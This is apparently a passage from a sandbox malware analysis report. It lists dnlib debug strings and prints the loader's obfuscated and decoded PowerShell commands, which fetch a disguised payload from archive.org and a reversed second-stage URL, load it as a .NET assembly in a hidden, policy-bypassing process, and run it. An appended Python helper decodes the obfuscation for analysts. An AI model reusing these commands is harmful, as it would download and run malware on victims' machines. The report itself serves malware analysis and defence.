        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ?", "0", "false");
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? 
? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBF? ? ? ? ?E4? ? ? ? ?R? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7?
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated argument: the UTF-16LE base64 encoding of the PowerShell text that the next entry shows decoded, with every base64 'A' replaced by a placeholder token the report renders as "? ? ? ? ?"; the argument is truncated in the report]
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))"
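The two-stage loader in the entries above (and in the identical wscript.exe to powershell.exe entry listed again under HIPS / PFW / Operating System Protection Evasion below) can be unpacked by hand, but a responder usually wants it done repeatably. The following Python is an added example written for this report, not code from the sample, from dnlib, or from the sandbox vendor. `decode_stage1` undoes the 'A' substitution in the wscript-spawned command line: the report renders the sample's placeholder as "? ? ? ? ?", and treating that token as the base64 character 'A' is an assumption that the decode itself confirms, because the result is the start of the command shown decoded above. `carve_payload` reproduces the `<<BASE64_START>>` / `<<BASE64_END>>` extraction against a constructed stand-in for deathnote.jpg (the real file was not fetched; only the framing is reproduced), `looks_like_pe` is a cheap sanity check on what `Assembly.Load` expects, and `unreverse` turns the first VAI argument back into a URL. Two points worth noting in the decoded command: `$startIndex -ge 0 -and $endIndex -gt $startIndex;` is a bare expression whose value is discarded, so the loader never actually checks that the markers were found (the function below does); and the fourth VAI argument, 'neuromo', is the file name that later appears in the Run key as C:\ProgramData\neuromo.js under Boot Survival.

```python
import base64
import re

# Placeholder token as the sandbox report renders it. The sample's own
# placeholder string is not visible in the truncated command line; the
# decode below confirms that it stands in for the base64 character 'A'.
REPORT_PLACEHOLDER = "? ? ? ? ?"

# Excerpt copied from the report's wscript.exe -> powershell.exe command line.
REPORT_EXCERPT = (
    "J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw"
    "? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ"
    "? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?"
)

START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"


def decode_stage1(obfuscated: str, placeholder: str = REPORT_PLACEHOLDER) -> str:
    """Undo the 'A' substitution and decode the UTF-16LE base64 PowerShell text.

    Only whole groups of four base64 characters are decoded, so a command line
    that the report truncated mid-string still yields its readable prefix.
    """
    restored = obfuscated.replace(placeholder, "A")
    if not re.fullmatch(r"[A-Za-z0-9+/=]*", restored):
        raise ValueError("unexpected characters after placeholder restoration")
    restored = restored[: len(restored) - len(restored) % 4]
    raw = base64.b64decode(restored, validate=True)
    # PowerShell encoded-command text is UTF-16LE; drop an odd trailing byte.
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")


def carve_payload(blob: bytes) -> bytes:
    """Extract and base64-decode the data between the two marker strings.

    The loader searches the file as text; searching the raw bytes for the same
    ASCII markers is equivalent and avoids decoding JPEG data as UTF-8.
    Unlike the loader, this refuses to proceed when the markers are missing
    or out of order instead of silently slicing garbage.
    """
    start = blob.find(START_FLAG)
    end = blob.find(END_FLAG)
    if start < 0 or end <= start:
        raise ValueError("payload markers not found or out of order")
    encoded = blob[start + len(START_FLAG):end].strip()
    return base64.b64decode(encoded, validate=True)


def looks_like_pe(payload: bytes) -> bool:
    """Cheap sanity check for what Assembly.Load expects: an MZ header pointing at a PE signature."""
    if len(payload) < 0x40 or payload[:2] != b"MZ":
        return False
    pe_offset = int.from_bytes(payload[0x3C:0x40], "little")
    return payload[pe_offset:pe_offset + 4] == b"PE\0\0"


def unreverse(argument: str) -> str:
    """The VAI method receives its download URL written backwards."""
    return argument[::-1]


# Constructed stand-in for deathnote.jpg: JPEG-looking bytes around the markers
# and a minimal MZ/PE header instead of a real .NET assembly.
FAKE_PAYLOAD = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\xcc" * 16
FAKE_IMAGE = (
    b"\xff\xd8\xff\xe0JFIF\0\x01" + b"\x80" * 32
    + START_FLAG + base64.b64encode(FAKE_PAYLOAD) + END_FLAG
    + b"\xff\xd9"
)

if __name__ == "__main__":
    print(decode_stage1(REPORT_EXCERPT))
    print(unreverse("txt.yks/nimda-pw/eg.osam//:sptth"))
    print(looks_like_pe(carve_payload(FAKE_IMAGE)))
```

Run against the excerpt, `decode_stage1` yields `$imageUrl = 'https://`, the opening of the command in the second entry; feeding it the full (untruncated) argument from a live capture gives the whole stage-1 script. The placeholder is a parameter because other builds of this loader substitute a different token; the regex check after restoration catches a wrong guess immediately rather than producing a base64 error further down.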
